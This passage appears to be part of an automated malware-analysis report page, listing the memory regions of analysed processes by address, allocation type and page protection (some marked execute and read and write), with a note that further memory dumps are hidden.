page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
81DC000
|
stack
|
page read and write
|
||
|
E90000
|
trusted library section
|
page read and write
|
||
|
8205000
|
remote allocation
|
page execute and read and write
|
||
|
27560000
|
trusted library allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
27690000
|
trusted library allocation
|
page read and write
|
||
|
26872000
|
trusted library allocation
|
page read and write
|
||
|
8BCD000
|
heap
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
23165F88000
|
heap
|
page read and write
|
||
|
8B8A000
|
heap
|
page read and write
|
||
|
11F97420000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D06000
|
trusted library allocation
|
page execute and read and write
|
||
|
449C000
|
stack
|
page read and write
|
||
|
8410000
|
trusted library allocation
|
page read and write
|
||
|
6EFD000
|
stack
|
page read and write
|
||
|
23167EB6000
|
heap
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
6B00000
|
direct allocation
|
page read and write
|
||
|
7310000
|
trusted library allocation
|
page read and write
|
||
|
2681C000
|
stack
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
27720000
|
trusted library allocation
|
page read and write
|
||
|
23167ECD000
|
heap
|
page read and write
|
||
|
247D0000
|
heap
|
page read and write
|
||
|
27530000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E05000
|
trusted library allocation
|
page read and write
|
||
|
23167EEA000
|
heap
|
page read and write
|
||
|
5A5000
|
heap
|
page read and write
|
||
|
8258000
|
heap
|
page read and write
|
||
|
458F000
|
stack
|
page read and write
|
||
|
23165F65000
|
heap
|
page read and write
|
||
|
461E000
|
stack
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
945000
|
heap
|
page read and write
|
||
|
7F70000
|
trusted library allocation
|
page read and write
|
||
|
72E0000
|
trusted library allocation
|
page read and write
|
||
|
23165F57000
|
heap
|
page read and write
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
23167EBD000
|
heap
|
page read and write
|
||
|
247B0000
|
trusted library allocation
|
page read and write
|
||
|
23167FB0000
|
heap
|
page read and write
|
||
|
6B50000
|
direct allocation
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
27690000
|
trusted library allocation
|
page read and write
|
||
|
70D2000
|
heap
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
11057C000
|
stack
|
page read and write
|
||
|
27690000
|
trusted library allocation
|
page read and write
|
||
|
27690000
|
trusted library allocation
|
page read and write
|
||
|
8D75000
|
direct allocation
|
page execute and read and write
|
||
|
7104000
|
heap
|
page read and write
|
||
|
23167EBA000
|
heap
|
page read and write
|
||
|
7E5E000
|
stack
|
page read and write
|
||
|
7DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23165FB9000
|
heap
|
page read and write
|
||
|
23165E50000
|
heap
|
page read and write
|
||
|
27520000
|
trusted library allocation
|
page read and write
|
||
|
27530000
|
trusted library allocation
|
page read and write
|
||
|
23D70000
|
direct allocation
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
11067E000
|
stack
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
23165F8B000
|
heap
|
page read and write
|
||
|
7360000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
23165EC7000
|
heap
|
page read and write
|
||
|
269A0000
|
heap
|
page execute and read and write
|
||
|
EB0000
|
trusted library allocation
|
page read and write
|
||
|
27540000
|
trusted library allocation
|
page read and write
|
||
|
27680000
|
trusted library allocation
|
page execute and read and write
|
||
|
23165E40000
|
heap
|
page read and write
|
||
|
7FF848D40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
27550000
|
trusted library allocation
|
page read and write
|
||
|
27670000
|
trusted library allocation
|
page read and write
|
||
|
F6E000
|
stack
|
page read and write
|
||
|
71AB000
|
heap
|
page read and write
|
||
|
8480000
|
direct allocation
|
page read and write
|
||
|
27690000
|
trusted library allocation
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
11F994DF000
|
trusted library allocation
|
page read and write
|
||
|
10FD93000
|
stack
|
page read and write
|
||
|
27580000
|
trusted library allocation
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
2437D000
|
stack
|
page read and write
|
||
|
25841000
|
trusted library allocation
|
page read and write
|
||
|
11F973A0000
|
heap
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
2688D000
|
trusted library allocation
|
page read and write
|
||
|
11027E000
|
stack
|
page read and write
|
||
|
23167ED5000
|
heap
|
page read and write
|
||
|
55375FF000
|
stack
|
page read and write
|
||
|
27690000
|
trusted library allocation
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
27530000
|
trusted library allocation
|
page read and write
|
||
|
87E000
|
stack
|
page read and write
|
||
|
23167EDA000
|
heap
|
page read and write
|
||
|
11F972C6000
|
heap
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
55374FF000
|
stack
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
8C40000
|
heap
|
page read and write
|
||
|
2686B000
|
trusted library allocation
|
page read and write
|
||
|
2692B000
|
stack
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
4430000
|
heap
|
page readonly
|
||
|
7D97000
|
stack
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
23165F32000
|
heap
|
page read and write
|
||
|
275A3000
|
trusted library allocation
|
page read and write
|
||
|
11FB162E000
|
heap
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
11F972A4000
|
heap
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
820B000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
23167EB5000
|
heap
|
page read and write
|
||
|
11F996BE000
|
trusted library allocation
|
page read and write
|
||
|
26990000
|
trusted library allocation
|
page read and write
|
||
|
55373FF000
|
stack
|
page read and write
|
||
|
23165F18000
|
heap
|
page read and write
|
||
|
7FF848C24000
|
trusted library allocation
|
page read and write
|
||
|
83E000
|
stack
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
23167EBD000
|
heap
|
page read and write
|
||
|
27520000
|
trusted library allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DD1000
|
trusted library allocation
|
page read and write
|
||
|
EC0000
|
trusted library allocation
|
page read and write
|
||
|
6D7E000
|
stack
|
page read and write
|
||
|
538000
|
stack
|
page read and write
|
||
|
11F972CD000
|
heap
|
page read and write
|
||
|
6B60000
|
direct allocation
|
page read and write
|
||
|
23165F7E000
|
heap
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
27690000
|
trusted library allocation
|
page read and write
|
||
|
8BD000
|
heap
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
7F5B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7340000
|
trusted library allocation
|
page read and write
|
||
|
27530000
|
trusted library allocation
|
page read and write
|
||
|
23165F6A000
|
heap
|
page read and write
|
||
|
569E000
|
trusted library allocation
|
page read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
7DC0000
|
trusted library allocation
|
page read and write
|
||
|
27540000
|
trusted library allocation
|
page read and write
|
||
|
23167EE5000
|
heap
|
page read and write
|
||
|
6BAD000
|
stack
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FC5000
|
trusted library allocation
|
page execute and read and write
|
||
|
23167EBD000
|
heap
|
page read and write
|
||
|
4694000
|
trusted library allocation
|
page read and write
|
||
|
23165F7E000
|
heap
|
page read and write
|
||
|
231680C1000
|
heap
|
page read and write
|
||
|
27513000
|
trusted library allocation
|
page read and write
|
||
|
F10000
|
trusted library allocation
|
page read and write
|
||
|
27740000
|
trusted library allocation
|
page execute and read and write
|
||
|
ED0000
|
trusted library allocation
|
page read and write
|
||
|
2755E000
|
stack
|
page read and write
|
||
|
7FF848DDA000
|
trusted library allocation
|
page read and write
|
||
|
26ECE000
|
stack
|
page read and write
|
||
|
8BD8000
|
heap
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
8BE0000
|
direct allocation
|
page execute and read and write
|
||
|
11FB1560000
|
heap
|
page execute and read and write
|
||
|
11F974E0000
|
heap
|
page read and write
|
||
|
26892000
|
trusted library allocation
|
page read and write
|
||
|
EF0000
|
trusted library allocation
|
page read and write
|
||
|
2755E000
|
trusted library allocation
|
page read and write
|
||
|
11F994B1000
|
trusted library allocation
|
page read and write
|
||
|
8460000
|
direct allocation
|
page read and write
|
||
|
70F4000
|
heap
|
page read and write
|
||
|
11017E000
|
stack
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
72DD000
|
stack
|
page read and write
|
||
|
26980000
|
trusted library allocation
|
page read and write
|
||
|
69AE000
|
stack
|
page read and write
|
||
|
71AD000
|
heap
|
page read and write
|
||
|
245E0000
|
heap
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
714A000
|
heap
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
7EEE000
|
stack
|
page read and write
|
||
|
7E90000
|
trusted library allocation
|
page read and write
|
||
|
84A0000
|
direct allocation
|
page read and write
|
||
|
11F9ADD4000
|
trusted library allocation
|
page read and write
|
||
|
11F995A1000
|
trusted library allocation
|
page read and write
|
||
|
6C2E000
|
stack
|
page read and write
|
||
|
23165F53000
|
heap
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
6BEA000
|
stack
|
page read and write
|
||
|
241AD000
|
stack
|
page read and write
|
||
|
2FD0000
|
trusted library allocation
|
page execute and read and write
|
There are 780 hidden memdumps, click here to show them.